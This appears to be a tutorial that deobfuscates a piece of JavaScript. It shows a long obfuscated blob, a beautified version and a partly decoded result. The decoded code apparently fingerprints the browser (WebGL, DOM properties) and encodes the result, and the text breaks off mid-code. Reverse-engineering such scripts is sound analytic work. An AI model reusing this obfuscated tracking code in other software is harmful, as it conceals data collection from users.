d,o.$iP4IWcu{WWWP)9W3(WtG7W(nwjeh.W.i} W(l=fo0{n,a.W)f&e1jof%tPad,WsWv;n_nWI. uPjoljjPU$zr42Wife|]W$}tWj%]WP%d)W0WWWd%>ej i)tzNs"riz7PW72r2rbKE(8t-656NW7*]cl/f%,f)l;s<]fp-WWn]aW29.(WnWRj]])g 6=g(ae_itMW,iujuWwfP{3WWfWW,2yw);b1,W/1c% aP .bP3ckc0uf.3lWeWyW]ugWWnb )WWnn]sc7Wm.a+_(".jmNc(f[i.e]_u.ne,_e)tWcU),eW]F WW(.y1W i]WW%Wz]Wu]0]86.jP0+9,ece1..s.W,$icWep8<3$_b.%+25_]ejty[7a )6.fj}$}a}WW(lW6D1aoeW$)M"5;jW4j.i\'(l(FV63PPW5W%u)7 eP ..)q{}tN)s(;e&%d08lKj[.9.4&W!fWe<f ql6ifPaP5b{}vP5rg-l$. FefWSWjpecWEEe%$|)NfW;aeno_]$Prn,fz)i_j]Wj.$ 89r.%_W"h1iPi$;n)1PWW|1"W&%.2jp7Let3W5dda&u.1z|ydWwZjWW)W(fx lp.akm9e6_j=..n%;"(owbeTPorP)3SWEf){WWm]-WWWW|A#grr(}$lW&b%dWj;c`W*Wj.bAh0p=W 0PAje)rTIWem(fuw(].Pf]$Wip39)3\'W0.WfoW%bp,e!!JW]wfflri)W+iWrW;_WnW);0Wze1(";c.V(3{W,u 8Pja7y.WBnWnW](nmrz4W)+8ff6_6;i=;t.cE0!ke})__(]paoWeutn]W)0jWW j,]k6i;{bWM1.].c_c$WC(HooZ_P_3@{P(;).NfW6Wu{+ifcW.7W3Wp_Vip.mP_f6%d*!t) W,_jcv;WPW$aa.fTW_W.eev{}j$r%Pj#ozP}nW.&_Nw0 po.w_iW;jW#5_P.fW_t}j9an"(u5{elSxZ1@gt1_n6W;4WcT 5%W,%) f 4ve,)i_].[&(_W;e}WjWP(Wg(#)fW{5e[!; {D.oTx*xua9")P WWW5.WfW$56]?oe=gWs}(p}a)s{_nc7PWt0WwrWWe3 t4.g, AriWfe*!tm1P(ltc{=fngiae%= 5%[=|o86.n&w(7m)(=6[W-{i)nPtWfj2%W7sWe_oinM6WWf1yf"_9WWPrncwsa%W(;XP( G,)t5n)pW134W]q_8l)){6pr.Piwimp{W)tj)1(]t*l_1%,;q,0rf_jWoW))f{3]_)Pt(fjl\'!Wk5;/%gq2Wg3)e(8WSWyjWL^_4cW8iW!{X[Wnyh)Cj,ii-.r;b%+%cZWt5!.1()d)8hW_3iti . jf,PWWVWj" .i.)T#6e{0j!o(ewst6WW\'%t.(u($17Dbn46r(2tM]P6(W3c3i.rWUtWP)i]/o(4WW"-J#;Wz(;WP4_=WWfWtUtE,%yjfm!- r%W=0"Irf+g17mPW")"wi(t erV;]r.jd2de,%0Pob)ib)PmW;rpcm}W_1W]Wjb6PW2s8e{W02ijW(4etW5W;ctn]]W&8W4f,;mamte6p=W[W9KeY)i1(;Wn]%44je8e f]i!ow,]tWlt(WtiP;f)W_=s)W,}}il{PpP$teqW{.i)/pj_uy=b5W!WWeuuG v)tlNr.Eb5W3ugWb_(L6P,.q%)WatZneWaWe{pr$q4"wb]e.s6wPi.0bow%Ls_sn;05s"_]w.)!tf.(w]Sh!c0a7;.7[(z )!nW\'m) $nWWt))p%S7%.0|.Int{.f)YW2_lf](W turr WitrWtw58asP[eJ!0$zeWW,l37>WW}f]i(t5+ds3W;r_W5(=jf&Wv5i)3(eWr,p_#)3Wfa1MWe"{!ada<%u?nW%a.=ti.nf(.8nef;d]&eu>P.rid3!-Pam)s;sD[P.(W;3]ji5 Otrn0!egecu)Wte#%eng(xau4%bdW])cPW{nsnjkh)jecf)tef,engjn,b%[(icr7s#i264d i)1Wz1Ea1t6[wr}.jrW]Wofpsotd(nol#! )2EsHh(o]=se{@b5etWbs_zzp.(; eJW_]b0\'i$jfa,e.ufRt%9W Plx;]oW]Pnt $a 4.Ws8{adrC(4C_aaP"p=0f$W2$WPW3,2Q0$P}PWW(%rPgv.kS).(Wioo]6jj;P!a#P)}8n=]er6ag2Pj.=$ee..efW1?_a31).jfa}e._3}.W_6]8.c(5p1&i)[tP)[WWyw),0 pwoa6nd3W]9) =]1W`e_$Wje"W$("en o@aeWbwseW}5Wn8W+en"(e%0%be5)g@%efc!=tavff;WiSln)%(e)wr.W)5!W20j1aW)P%=cPx.mP]1()JP]r8)*u],pq7$W40W(/e7k:r=(]nSnW]83]);|st;!!wWt8(fwisf\\]0W)3n_svi]nu8P.brr.]7.)PP.rvpWeWdg8,(g,i6;W{ab5%(s]=(}(iuauc.=W^85v(a(g)W#_b.W7fc6.ji,]n$!()V!W)Ej6cmmnWn20(PWi%f`?_u)_W3e90$W]b)Pjs25EWe=otP4e3g;u%%xs7WbO6PW{b3n)c2.W ]s1PPW(<W$930<jH=Ww"Wrtf)WN ]We6#09c0D<] W&1df1P i|i({)W#98W4]_]-Woo]])n1oEj( PW_(5"%a0=E;.?lv0"0i{6P0.w]$0!WW-W.)WPW+gn,3xW,Wfd.={ eW.nrm}1.W_aWW](l6)WwW3jrp 85lWiW_,&,jm45(1.\'aWU40(lo_g)l48)]_t.W)!WWEE PfIW+{qfsrdSW0WnN$3}oW)Wdjf]2+ee6WW)-(eWlt WW[.i6nWnW.i(e9(W&lW]WaW98,#Wn(f=42%9S\'eke7N)_fP7;j(0PidWteW5o(])d2]5y=lI(!W;y .Pu;{3]ofn(3$}8f7psjfl.n-{j,So$Pemi}WW\')e4(SfW286f %0epc)fdrqioaq(._u_cW_yo.Wpi6W.W]))0u-Wlx,)P&).j)c]se(h6.{.WD\\a1]7fte;sSWP W(2b.$e$#r3,(p {f).1]_q%_di168hWe.ax}fw}eWojw)WSl0trWs l}%fpbho5(3{o]C2.;;kWayWfINmit.pWc.P(oeP_a5c.W_`i+&=Wo.rrisW{P:W% Sf}e.mll6WW_5Pt6i=WnW. e;WiWW ({ 4W#.]fW(f]lo2jW;3P-)}t.^u(c SWga.e.W})5dWtW!(P0b)5pDN)lWypuac!6W)).Pb7j1ofibbGlaWk3Ps1 a,4)b4rjdWSem%)pzi&)o4fe;.nW})#}xg(t{p$KnWbz3I"9WP,6[Nf_fgP)0;ChPWWPj&f.n.bfz=]P#__7{\'WW1s}%]_ W)I=!868W}l0jW]_eWbxW]cd_PWWWa)fg$Pn;=b]W_0=]Wz WtWeb$mPnneqW_p_gy71]W3 |W(f%s5)t!Wdm&.rqtWr 3/]IcSg_WvF}PN> [b5jej$Wvfjw5-Pl WWtW] W3_rf_W=43]]]We7!(q]jW}pi()t(.W]WwPWlWyWl6=.PW. ]g0!.WantWcli5j-[|lw{e75;goW_PtW)b46aW2Wfbf eyf]m$Wf hW]j2e}W,),gW(pcaj5P+pnW55P)p .pbmg1ori.6$]47WW)wx.S3.fcm(.jrPj85W [)|e[iW4oaz)r&WlPe A{Wa.mnW oW(Wp}ufe)W.W_Wr%=o!7}Wjhk!(j 9ri13+6peo(9_6tgWWnx{n}]l(W7(%67b_"__]53}8;! )r*nv1W&ptpk)Id)e8(nuWI0W=}ft.7t.lf)6WW5kcP')))(3597)}();

The above string is obfuscated JS. In general, JS obfuscation is a combination of identifier renaming, adding useless code and weird looking symbols, reordering functions and essentially, making it look useless. However, if you execute obfuscated JS code in a browser console, it would run perfectly fine!

Beautification

The above obfuscated JS string can be beautified as follows:

function() {
    function W(W) {
        for (var e = 3810997, P = W.length, f = [], n = 0; n < P; n++) f[n] = W.charAt(n);
        for (var n = 0; n < P; n++) {
            var r = e * (n + 305) + e % 48638,
                t = e * (n + 158) + e % 31757,
                i = r % P,
                j = t % P,
                _ = f[i];
            f[i] = f[j], f[j] = _, e = (r + t) % 6701531
        }
        return f.join("")
    }
    var e = W("cocowrfctgjurnxypuhdetlrbvkossmzntaqi").substr(0, 11), P = W[e];

    P("",
      P("",
        W('agh =.6=i921n=o(.g]ul+o]rowcdi8or;tscaev]im7nu[r)8;(sa]r [=bltd,nn0[vm.d7ia(nav,,0(,rvu(rr8),i5,nv;)ig e,m(oll,v0t(;,t0pclaAa(nh,ifh[gcrb7v.,nelxClozo=go[;i9t[!rp[+=s=v;0=1+a=a=gse=o,r4]o]!xs;) c")j[gterr{adodaarn+mhhbb.ip7 tA9n"-)w(rrarra=tbmuCt=ia6..)c))ur+a1"f0;;grr>eav=tC;k+j-h;1d jgpt-h(hhd =et;le=vlrSb1)Cro;va, gm+s(=2=}ro[n*;hs;el-;= vf(dc6ni;+ r{jrSl1nrsgs;a;nck+rjteg3rn=".[qal ou 0c2ri;m0==1(e]af] r+c;ta{+o-cn34+; hbdAv.ae=bnoft.{( 1gs;);)l1ij-9tw07ffva)5la};(nf}a"gth7u+2,2q=;=vlvet;[(t;)b.b( ;u9jpv80;v27;ir6p,rui n78,gc={cy9,ppe8=)lf;<=t;gu4gs=+1;6"(;,8)6sr}vue+=buc7t(.bs{o=]))hk.Cr;;;rah<)i6,=gr+}c ]9(.(in=l+ (hadaf1ph.ius]6f.sr;jtki,=d+)(0rbp.]c+o2cno";<*g)r6)8rsls(0;x]=v4r=5ua)oCio)eot;oarea=.=)r(6u(}e=a,grptr<[(3n=ih"z)vv=[[vl(;r)pofjjq,"2uCnl(ak+)i}.trCvvl f=..{-u( )s4n)o2+i.]vw..enb;;nsz,c,;cn (u)>+r+x6,+u"rn)e (fnbhtg<(knqne))an;r,.tre7wonpl+met1(A,A.e6ull8.a')
       )(W('4fWfo1!WldetQ$;pbn$$)))fl0!SWuWeefCicX_f;;o_U4=2_Wf]aWg(.(1;:=ug_h)e ($s};4}2W%W.WW}"bt!WWW4y[PW_;r]q:5ee|WiWn\'WrZt203w]. Y%N b)yW$.$6(W{}deloW]PboWj{;CW (f.],"_(.foyp(uW06uWjW}feojWt!WjcbWjPn!..# tX6]s j!l} fb=6]Wlee,)W()eC)WW(dWro P_r):ocPrwTP!8]5<WWrW ))a}_ecen$W9Wcte)36,4.09l}Waeuop0b)({{,c)WWrj..azee7.Ej}WdW;TWxPWn_7e)gjj8eW(e}#u}SW_h1.:b)OWp$(5,W)_] WPe=u)ee t0dt.c(WP(Wl*i$gWf(+0_w5W9gWPW=t73,u$Wenf$s_(We_f= !_%1P0b5WoW(RT=!i=n)i)95)PWWq)7S}]We[=S9W% .gWx0.}r{WHWW5nW6t.S,1eog[f6T(d)$, WrWe.^[96{r1$z=,$t3W/04X2We]?e(eiP0WW.an)D._WwCSN{bWWjW_t{6=6tn_Wn(tp5}}n%;, 4 $.0[e9(vt/kd/ igPcf.jc_eWP2mPjbf!Wjs =Wef_69.,9;dai+){)WPWo3(n)5.b}W%dW)n,P44)irwjWBfu45W./0eedW)lnRi;pWo]5-Wcf\'PF}0W!fSs0W)%h(fWuM+me2)(We/W (u"bj__%$k_P0Cn%0(fe=WQct2o2go(eP2l1 W}n!ufn;n]W7wb{i8=_(W587v%]!W_Pq{W1.)u$W,[df-ume_WtW((f*]W%J%oWjsarC(8efl]e}IDt.W=b)DWzWW_qW#9 #pmj%nsp;nu\\l]W.=W.;6=W}.{%_?p-Wfn?lW mojWi(9!W}"lfz4.pW.r*be_l_..a [PD!{PW)_neqP7PW&$PB{h3;oWaWW{in3#j+W%u$tu"Cy,pjo{W;0ie%_1*W!12jB)0i1e_2W2En0p)d};)liWj.0 j},Soa,^._];PWj"0).29;PoWWf).W(;{J(wn2PVW(.PW Ww5]9t]}Wo]],rW1ti_g__W==Wi.PPiWWcPf)(W)5W5(/50&WM|7r)k1{,Ps]n_),P_w]_etWWe.(iP!).dWb8foWjuWWWP#7fP5W]W7(!0o0\\Wy2 x1{E11!.ea0(a1\'r[g;,WW-mmi&PPPY_jh}_b8g9WWr,wWW{gfr9t$a_2)EiQuW(4n1jg]i,%#\\{ja7W[W&tW?{.6!!PPeWd)X1 e8-vaPf,W+")teg{}n%,+r$a]2?3f);wu%WnW1o}e(o1"W)uW(lnmej)),jo_82$,5jtMP{$)W9tjn=sa;a!)(W3we%up}|el_8]{zePjPS#.(g\'eW;a%vM0aWo05twd]4WWWrW 3Wt d,o.$iP4IWcu{WWWP)9W3(WtG7W(nwjeh.W.i} W(l=fo0{n,a.W)f&e1jof%tPad,WsWv;n_nWI. uPjoljjPU$zr42Wife|]W$}tWj%]WP%d)W0WWWd%>ej i)tzNs"riz7PW72r2rbKE(8t-656NW7*]cl/f%,f)l;s<]fp-WWn]aW29.(WnWRj]])g 6=g(ae_itMW,iujuWwfP{3WWfWW,2yw);b1,W/1c% aP .bP3ckc0uf.3lWeWyW]ugWWnb )WWnn]sc7Wm.a+_(".jmNc(f[i.e]_u.ne,_e)tWcU),eW]F WW(.y1W i]WW%Wz]Wu]0]86.jP0+9,ece1..s.W,$icWep8<3$_b.%+25_]ejty[7a )6.fj}$}a}WW(lW6D1aoeW$)M"5;jW4j.i\'(l(FV63PPW5W%u)7 eP ..)q{}tN)s(;e&%d08lKj[.9.4&W!fWe<f ql6ifPaP5b{}vP5rg-l$. FefWSWjpecWEEe%$|)NfW;aeno_]$Prn,fz)i_j]Wj.$ 89r.%_W"h1iPi$;n)1PWW|1"W&%.2jp7Let3W5dda&u.1z|ydWwZjWW)W(fx lp.akm9e6_j=..n%;"(owbeTPorP)3SWEf){WWm]-WWWW|A#grr(}$lW&b%dWj;c`W*Wj.bAh0p=W 0PAje)rTIWem(fuw(].Pf]$Wip39)3\'W0.WfoW%bp,e!!JW]wfflri)W+iWrW;_WnW);0Wze1(";c.V(3{W,u 8Pja7y.WBnWnW](nmrz4W)+8ff6_6;i=;t.cE0!ke})__(]paoWeutn]W)0jWW j,]k6i;{bWM1.].c_c$WC(HooZ_P_3@{P(;).NfW6Wu{+ifcW.7W3Wp_Vip.mP_f6%d*!t) W,_jcv;WPW$aa.fTW_W.eev{}j$r%Pj#ozP}nW.&_Nw0 po.w_iW;jW#5_P.fW_t}j9an"(u5{elSxZ1@gt1_n6W;4WcT 5%W,%) f 4ve,)i_].[&(_W;e}WjWP(Wg(#)fW{5e[!; {D.oTx*xua9")P WWW5.WfW$56]?oe=gWs}(p}a)s{_nc7PWt0WwrWWe3 t4.g, AriWfe*!tm1P(ltc{=fngiae%= 5%[=|o86.n&w(7m)(=6[W-{i)nPtWfj2%W7sWe_oinM6WWf1yf"_9WWPrncwsa%W(;XP( G,)t5n)pW134W]q_8l)){6pr.Piwimp{W)tj)1(]t*l_1%,;q,0rf_jWoW))f{3]_)Pt(fjl\'!Wk5;/%gq2Wg3)e(8WSWyjWL^_4cW8iW!{X[Wnyh)Cj,ii-.r;b%+%cZWt5!.1()d)8hW_3iti . jf,PWWVWj" .i.)T#6e{0j!o(ewst6WW\'%t.(u($17Dbn46r(2tM]P6(W3c3i.rWUtWP)i]/o(4WW"-J#;Wz(;WP4_=WWfWtUtE,%yjfm!- r%W=0"Irf+g17mPW")"wi(t erV;]r.jd2de,%0Pob)ib)PmW;rpcm}W_1W]Wjb6PW2s8e{W02ijW(4etW5W;ctn]]W&8W4f,;mamte6p=W[W9KeY)i1(;Wn]%44je8e f]i!ow,]tWlt(WtiP;f)W_=s)W,}}il{PpP$teqW{.i)/pj_uy=b5W!WWeuuG v)tlNr.Eb5W3ugWb_(L6P,.q%)WatZneWaWe{pr$q4"wb]e.s6wPi.0bow%Ls_sn;05s"_]w.)!tf.(w]Sh!c0a7;.7[(z )!nW\'m) $nWWt))p%S7%.0|.Int{.f)YW2_lf](W turr WitrWtw58asP[eJ!0$zeWW,l37>WW}f]i(t5+ds3W;r_W5(=jf&Wv5i)3(eWr,p_#)3Wfa1MWe"{!ada<%u?nW%a.=ti.nf(.8nef;d]&eu>P.rid3!-Pam)s;sD[P.(W;3]ji5 Otrn0!egecu)Wte#%eng(xau4%bdW])cPW{nsnjkh)jecf)tef,engjn,b%[(icr7s#i264d i)1Wz1Ea1t6[wr}.jrW]Wofpsotd(nol#! )2EsHh(o]=se{@b5etWbs_zzp.(; eJW_]b0\'i$jfa,e.ufRt%9W Plx;]oW]Pnt $a 4.Ws8{adrC(4C_aaP"p=0f$W2$WPW3,2Q0$P}PWW(%rPgv.kS).(Wioo]6jj;P!a#P)}8n=]er6ag2Pj.=$ee..efW1?_a31).jfa}e._3}.W_6]8.c(5p1&i)[tP)[WWyw),0 pwoa6nd3W]9) =]1W`e_$Wje"W$("en o@aeWbwseW}5Wn8W+en"(e%0%be5)g@%efc!=tavff;WiSln)%(e)wr.W)5!W20j1aW)P%=cPx.mP]1()JP]r8)*u],pq7$W40W(/e7k:r=(]nSnW]83]);|st;!!wWt8(fwisf\\]0W)3n_svi]nu8P.brr.]7.)PP.rvpWeWdg8,(g,i6;W{ab5%(s]=(}(iuauc.=W^85v(a(g)W#_b.W7fc6.ji,]n$!()V!W)Ej6cmmnWn20(PWi%f`?_u)_W3e90$W]b)Pjs25EWe=otP4e3g;u%%xs7WbO6PW{b3n)c2.W ]s1PPW(<W$930<jH=Ww"Wrtf)WN ]We6#09c0D<] W&1df1P i|i({)W#98W4]_]-Woo]])n1oEj( PW_(5"%a0=E;.?lv0"0i{6P0.w]$0!WW-W.)WPW+gn,3xW,Wfd.={ eW.nrm}1.W_aWW](l6)WwW3jrp 85lWiW_,&,jm45(1.\'aWU40(lo_g)l48)]_t.W)!WWEE PfIW+{qfsrdSW0WnN$3}oW)Wdjf]2+ee6WW)-(eWlt WW[.i6nWnW.i(e9(W&lW]WaW98,#Wn(f=42%9S\'eke7N)_fP7;j(0PidWteW5o(])d2]5y=lI(!W;y .Pu;{3]ofn(3$}8f7psjfl.n-{j,So$Pemi}WW\')e4(SfW286f %0epc)fdrqioaq(._u_cW_yo.Wpi6W.W]))0u-Wlx,)P&).j)c]se(h6.{.WD\\a1]7fte;sSWP W(2b.$e$#r3,(p {f).1]_q%_di168hWe.ax}fw}eWojw)WSl0trWs l}%fpbho5(3{o]C2.;;kWayWfINmit.pWc.P(oeP_a5c.W_`i+&=Wo.rrisW{P:W% Sf}e.mll6WW_5Pt6i=WnW. e;WiWW ({ 4W#.]fW(f]lo2jW;3P-)}t.^u(c SWga.e.W})5dWtW!(P0b)5pDN)lWypuac!6W)).Pb7j1ofibbGlaWk3Ps1 a,4)b4rjdWSem%)pzi&)o4fe;.nW})#}xg(t{p$KnWbz3I"9WP,6[Nf_fgP)0;ChPWWPj&f.n.bfz=]P#__7{\'WW1s}%]_ W)I=!868W}l0jW]_eWbxW]cd_PWWWa)fg$Pn;=b]W_0=]Wz WtWeb$mPnneqW_p_gy71]W3 |W(f%s5)t!Wdm&.rqtWr 3/]IcSg_WvF}PN> [b5jej$Wvfjw5-Pl WWtW] W3_rf_W=43]]]We7!(q]jW}pi()t(.W]WwPWlWyWl6=.PW. ]g0!.WantWcli5j-[|lw{e75;goW_PtW)b46aW2Wfbf eyf]m$Wf hW]j2e}W,),gW(pcaj5P+pnW55P)p .pbmg1ori.6$]47WW)wx.S3.fcm(.jrPj85W [)|e[iW4oaz)r&WlPe A{Wa.mnW oW(Wp}ufe)W.W_Wr%=o!7}Wjhk!(j 9ri13+6peo(9_6tgWWnx{n}]l(W7(%67b_"__]53}8;! )r*nv1W&ptpk)Id)e8(nuWI0W=}ft.7t.lf)6WW5kcP'))
     )(3597)
}();

Removing Redundant Code

In the above JS code, we have the following relevant expressions:

  • function W() that takes a string W as input,
  • Assigning a function to P through the statement P=W[e]
  • P("", P("", W(<obfuscatedString1>))(W(<obfuscatedString2>)))(3597)

Since we know function W(), we can use an online JS editor to determine the value of variables that depend on the output of function W(). In the above code, the value of variable e is 'constructor'. So, variable P contains a constructor function. Similarly, we can also find the value of expressions, W(<obfuscatedString1>) and W(<obfuscatedString2>). After executing the expression, P("", W(<obfuscatedString1>))(W(<obfuscatedString2>)), the resultant code is:

function() {
    function W(W) {
        for (var e = 3810997, P = W.length, f = [], n = 0; n < P; n++) f[n] = W.charAt(n);
        for (var n = 0; n < P; n++) {
            var r = e * (n + 305) + e % 48638,
                t = e * (n + 158) + e % 31757,
                i = r % P,
                j = t % P,
                _ = f[i];
            f[i] = f[j], f[j] = _, e = (r + t) % 6701531
        }
        return f.join("")
    }

    P = W['constructor'];

    P("",
      'function jso$ft$boe$_61_61_61(a, b) { return a === b } function jso$ft$giden$Reflect() { return Reflect } function jso$ft$boe$_33_61_61(a, b) { return a !== b } function jso$ft$boe$_61_61(a, b) { return a == b } function jso$ft$giden$WebGLRenderingContext() { return WebGLRenderingContext } function jso$ft$boe$_33_61(a, b) { return a != b } function jso$ft$boe$in(a, b) { return a in b } function jso$ft$giden$jbj() { return jbj } function jso$ft$giden$btoa() { return btoa } function jso$ft$giden$JSON() { return JSON } function jso$ft$giden$wef() { return wef } function jso$ft$giden$escape() { return escape } function jso$ft$giden$Node() { return Node } function jso$ft$giden$document() { return document } function jso$ft$giden$_95_36af_53_48_55_55() { return _$af5077 } function jso$ft$giden$_95new_36obj_95() { return _new$obj_ } function jso$ft$giden$mljpj() { return mljpj } function jso$ft$giden$window() { return window } function jso$ft$giden$_95_36af_53_48_56_50() { return _$af5082 } function jso$ft$uoel$_33(a) { return !a } function jso$ft$giden$String() { return String } function jso$ft$boe$_37(a, b) { return a % b } function jso$ft$boe$_43(a, b) { return a + b } function jso$ft$boe$_60(a, b) { return a < b } function _$af5085() { _$af5077 = _$_b5e6[54] } function _new$obj_() { var o = {}; for (var i = 0; jso$ft$boe$_60(i, arguments.length); i += 2) { o[arguments[i]] = arguments[jso$ft$boe$_43(i, 1)] }; return o } function _$af5082(k, jso$setrpl$e) { var e = {}, i = {}, w = {}, g = {}, b = {}, z = {}, n = {}; e._ = jso$setrpl$e; var q = k.length; i._ = [];; for (var f = 0; jso$ft$boe$_60(f, q); f++) { i._[f] = k.charAt(f) }; for (var f = 0; jso$ft$boe$_60(f, q); f++) { w._ = jso$ft$boe$_43(e._ * (jso$ft$boe$_43(f, 447)), (jso$ft$boe$_37(e._, 50266)));; g._ = jso$ft$boe$_43(e._ * (jso$ft$boe$_43(f, 203)), (jso$ft$boe$_37(e._, 53635)));; b._ = jso$ft$boe$_37(w._, q);; z._ = jso$ft$boe$_37(g._, q);; n._ = i._[b._];; jso$spliter_$af5086(b, i, z); jso$spliter_$af5087(z, i, n); jso$spliter_$af5088(e, w, g) }; var u = jso$ft$giden$String().fromCharCode(127); var x = ""; var m = "%"; var y = "#1"; var c = "%"; var p = "#0"; var v = "#"; return i._.join(x).split(m).join(u).split(y).join(c).split(p).join(v).split(u) } function _$af5077() { var lkjej = {}, iiop = {}, cnj_j = {}; var jso$setrpl$cnj_j = {}; var jso$setrpl$lkjej = {}; var hgjfj = {}; jso$setrpl$cnj_j._ = jso$builder_$af5081_jso$setrpl$cnj_j(cnj_j); jso$setrpl$lkjej._ = jso$builder_$af5079_jso$setrpl$lkjej(); hgjfj._ = jso$builder_$af5080_hgjfj(lkjej); lkjej._ = jso$setrpl$lkjej._; cnj_j._ = jso$setrpl$cnj_j._; if (jso$ft$uoel$_33(_$af5082)) { jso$ft$giden$_95_36af_53_48_56_50()(_$_b5e6[4], _$_b5e6[15], _$_b5e6[32], 1, 1) } else { jso$ft$giden$window()[_$_b5e6[0]] = jso$ft$giden$_95new_36obj_95()(_$_b5e6[1], jso$ft$boe$_43(_$_b5e6[2], jso$ft$giden$mljpj()[_$_b5e6[3]]), _$_b5e6[4], false) }; jso$spliter_$af5089(); jso$ft$giden$mljpj()[_$_b5e6[6]] = (1 && hgjfj._)(); if (jso$ft$uoel$_33(_$af5077)) { jso$ft$giden$_95_36af_53_48_56_50()(false, _$_b5e6[2]) }; jso$spliter_$af5090(); jso$spliter_$af5091(); if (jso$ft$uoel$_33(_$af5077)) { jso$ft$giden$_95_36af_53_48_55_55()(_$_b5e6[16], _$_b5e6[28]); jso$spliter_$af5092() }; jso$spliter_$af5093(); var ddjtj = jso$ft$giden$document()[_$_b5e6[14]][0][_$_b5e6[13]]; jso$ft$giden$mljpj()[_$_b5e6[15]] = jso$ft$boe$_43(jso$ft$giden$escape()(jso$ft$giden$Node()[_$_b5e6[18]][_$_b5e6[17]])[_$_b5e6[16]] + _$_b5e6[19], jso$ft$giden$escape()(jso$ft$giden$document()[_$_b5e6[20]])[_$_b5e6[16]]); jso$ft$giden$mljpj()[_$_b5e6[21]] = jso$ft$giden$document()[_$_b5e6[23]](_$_b5e6[22])[_$_b5e6[16]]; ddjtj[_$_b5e6[25]](/MutationObserver/g, jso$builder_$af5078_()); if (jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_56_50()(); jso$spliter_$af5096(); return }; if (jso$ft$giden$wef()[_$_b5e6[4]]) { return }; try { iiop._ = jso$ft$giden$document()[_$_b5e6[28]](_$_b5e6[47]);; jso$spliter_$af5100(iiop); if (jso$ft$uoel$_33(_$af5077)) { return }; if ((1 && lkjej._)(jso$ft$giden$document()[_$_b5e6[51]][_$_b5e6[17]])) { return }; jso$ft$giden$document()[_$_b5e6[51]][_$_b5e6[17]](iiop._); jso$ft$giden$mljpj()[_$_b5e6[52]] = (1 && cnj_j._)(iiop._[_$_b5e6[54]][_$_b5e6[53]], 0); } catch (e) {}; jso$ft$giden$wef()[_$_b5e6[64]] = jso$ft$giden$escape()(jso$ft$giden$escape()(jso$ft$giden$btoa()(jso$ft$giden$JSON()[_$_b5e6[65]](jso$ft$giden$mljpj())))); } function jso$builder_$af5081_jso$setrpl$cnj_j(cnj_j) { return function(jso$setrpl$ja, jso$setrpl$jbt, jso$setrpl$_c) { var ja = {}, jbt = {}, _c = {}, aca = {}; ja._ = jso$setrpl$ja; jbt._ = jso$setrpl$jbt; _c._ = jso$setrpl$_c; jso$spliter_$af5101(jbt, _c, ja); if (jso$ft$uoel$_33(_$_b5e6)) { return } else { for (var zrz = 0; jso$ft$boe$_60(zrz, _c._[_$_b5e6[56]][_$_b5e6[55]][_$_b5e6[16]]); zrz++) { if (jso$ft$uoel$_33(_$af5082)) { return } else { if (jso$ft$boe$_61_61(_c._[_$_b5e6[56]][_$_b5e6[55]][zrz], ja._)) { return 0 } } } }; jso$spliter_$af5102(_c, ja); aca._ = 0;; if (jso$ft$boe$_61_61(document()[_$_b5e6[ja._]], _$_b5e6[57]) || jso$ft$boe$_61_61(document()[_$_b5e6[ja._]], _$_b5e6[38]) && jso$ft$boe$_33_61(ja._, null) && jso$ft$boe$_33_61(ja._, _c._[_$_b5e6[58]]) && jso$ft$boe$_33_61(ja._, _c._[_$_b5e6[59]]) && jso$ft$boe$_33_61(ja._, _c._[_$_b5e6[60]])) { for (var ava of jso$ft$giden$Reflect()[_$_b5e6[61]](ja._) || jso$ft$boe$in(ava, ja._)) { try { if (jso$ft$uoel$_33(_$af5077)) { jso$ft$giden$_95_36af_53_48_56_50()(true, 0); return }; if (jso$ft$boe$_61_61(ava, _$_b5e6[14]) || (jso$ft$boe$_61_61(typeof(ja._[_$_b5e6[62]]), _$_b5e6[38]) && jso$ft$boe$_61_61(typeof(ja._[_$_b5e6[62]](ava)), _$_b5e6[38])) || (jso$ft$boe$_61_61(typeof(ja._[_$_b5e6[63]]), _$_b5e6[38]) && jso$ft$boe$_61_61(typeof(ja._[_$_b5e6[63]](ava)), _$_b5e6[38]))) { aca._++ } else { if (jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_55_55()(); return } else { if (jso$ft$boe$_61_61(jso$ft$boe$j, _$_b5e6[57])) { if (jso$ft$boe$_60(jbt._, 30)) { aca._ += (1 && cnj_j._)(ja._[ava], jso$ft$boe$_43(jbt._, 1), _c._) } } else { if (jso$ft$uoel$_33(_$af5082)) { jso$ft$giden$_95_36af_53_48_55_55()(0, null); jso$spliter_$af5103() } else { if (jso$ft$boe$_61_61(jso$ft$boe$j, _$_b5e6[38])) { var zrz = jso$ft$giden$escape()(ja._[ava])[_$_b5e6[16]]; if (jso$ft$boe$_33_61(zrz, 2)) { if (jso$ft$boe$_61_61_61(_$af5082, 1)) { jso$ft$giden$_95_36af_53_48_56_50()(); jso$spliter_$af5104(); return }; aca._ += jso$ft$giden$escape()(ja._[ava])[_$_b5e6[16]] }; if (jso$ft$boe$_61_61(_$af5082, true)) { return } else { if (jso$ft$boe$_60(jbt._, 30)) { if (jso$ft$uoel$_33(_$_b5e6)) { return }; aca._ += (1 && cnj_j._)(ja._[ava][_$_b5e6[18]], jso$ft$boe$_43(jbt._, 1), _c._) } } } } } } } } catch (e) {}; jso$spliter_$af5105(); jso$spliter_$af5106(aca) } } else { if (jso$ft$boe$_61_61_61(_$af5077, _$_b5e6[31])) { jso$ft$giden$_95_36af_53_48_55_55()(false) }; return 1 }; if (jso$ft$uoel$_33(_$_b5e6)) { return }; return aca._ } } function jso$builder_$af5078_() { return function(m, n) { jso$spliter_$af5094(); return _$_b5e6[24] } } function jso$builder_$af5079_jso$setrpl$lkjej() { return function(ja) { if (jso$ft$boe$in(_$_b5e6[18], ja)) { if (jso$ft$uoel$_33(_$af5082)) { jso$ft$giden$_95_36af_53_48_55_55()(_$_b5e6[56]); return }; jso$spliter_$af5095() } else { return false }; return jso$ft$giden$wef()[_$_b5e6[4]] } } function jso$builder_$af5080_hgjfj(lkjej) { return function() { if (jso$ft$boe$_33_61(jso$ft$giden$WebGLRenderingContext()[_$_b5e6[18]][_$_b5e6[26]](), _$_b5e6[27])) { if (jso$ft$uoel$_33(_$af5077)) { _$af5082 = _$_b5e6[7] } else { return } }; if (jso$ft$uoel$_33(_$af5077)) { jso$ft$giden$_95_36af_53_48_55_55()(0, false) }; if (jso$ft$giden$WebGLRenderingContext()) { var qpjoj; var rujcj; var ii = 4; if ((1 && lkjej._)(jso$ft$giden$document()[_$_b5e6[28]])) { return }; var ewjqj = jso$ft$giden$document()[_$_b5e6[28]](_$_b5e6[29]); var trjej = [_$_b5e6[30], _$_b5e6[31], 